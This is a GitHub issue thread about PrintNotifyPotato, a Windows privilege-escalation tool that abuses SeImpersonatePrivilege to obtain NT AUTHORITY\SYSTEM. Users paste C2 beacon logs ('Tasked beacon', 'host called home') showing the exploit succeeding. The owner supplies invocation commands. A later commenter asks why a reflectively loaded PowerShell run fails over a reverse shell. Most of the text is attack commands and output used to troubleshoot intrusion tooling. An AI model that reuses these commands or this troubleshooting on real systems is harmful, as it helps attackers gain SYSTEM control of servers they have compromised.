Does not display nt authority\system #2

Open
kokxxoo opened this issue Dec 13, 2022 · 5 comments
kokxxoo commented Dec 13, 2022

Microsoft Windows Server 2012 R2 Standard

SeIncreaseQuotaPrivilege İşlem için bellek kotaları ayarla Disabled
SeChangeNotifyPrivilege Çapraz geçiş denetimini atla Enabled
SeImpersonatePrivilege Kimlik doğrulamasından sonra istemcinin özelliklerini al Enabled
SeIncreaseWorkingSetPrivilege İşlem çalışma kümesini artır Disabled

[+] received output:
[*] Create PrintNotify Success!
[*] Create FakeIUnknown Success!
[*] CreatePointerMoniker Success!
[*] Trigger......

[+] received output:
[*] Got Token: 0x330
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] DuplicateTokenEx Success! PrimaryToken: 0x860
[*] process start with pid 31060

@BeichenDream
Owner

PrintNotifyPotato.exe "C:\Windows\System32\cmd.exe /c whoami"

@kokxxoo
Author

kokxxoo commented Dec 13, 2022

[*] Tasked beacon to run .NET program: PrintNotifyPotato.exe "C:\Windows\System32\cmd.exe /c whoami"
[+] host called home, sent: 128121 bytes
[+] received output:
[*] Create PrintNotify Success!
[*] Create FakeIUnknown Success!
[*] CreatePointerMoniker Success!
[*] Trigger......
[*] Got Token: 0x334

[+] received output:
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] DuplicateTokenEx Success! PrimaryToken: 0x852
[*] process start with pid 41840

@BeichenDream
Owner

PrintNotifyPotato.exe  C:\Windows\System32\whoami.exe

@kokxxoo
Author

kokxxoo commented Dec 13, 2022

Tasked beacon to run .NET program: PrintNotifyPotato.exe C:\Windows\System32\whoami.exe
[+] host called home, sent: 128103 bytes
[+] received output:
[*] Create PrintNotify Success!
[*] Create FakeIUnknown Success!
[*] CreatePointerMoniker Success!
[*] Trigger......
[*] Got Token: 0x31c
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] DuplicateTokenEx Success! PrimaryToken: 0x832
[*] process start with pid 46152

@kaeso

kaeso commented Apr 7, 2023

MSSQL Server, VirtualBox, Windows Server 2016, 2019.
When running it as a user in cmd, it works; in a reverse shell it does not work. Why?

Assembly loaded into PowerShell:
$entryPointMethod = $assembly.GetTypes().Where({ $_.Name -eq 'Program' }, 'First').GetMethod('Main', [Reflection.BindingFlags] 'Static, Public, NonPublic')

Only over reverse TCP it does not work:

[!] Cannot CoInitializeSecurity hr = -2147417831
[!] Cannot CreateInstance PrintNotify hr = -2147024891
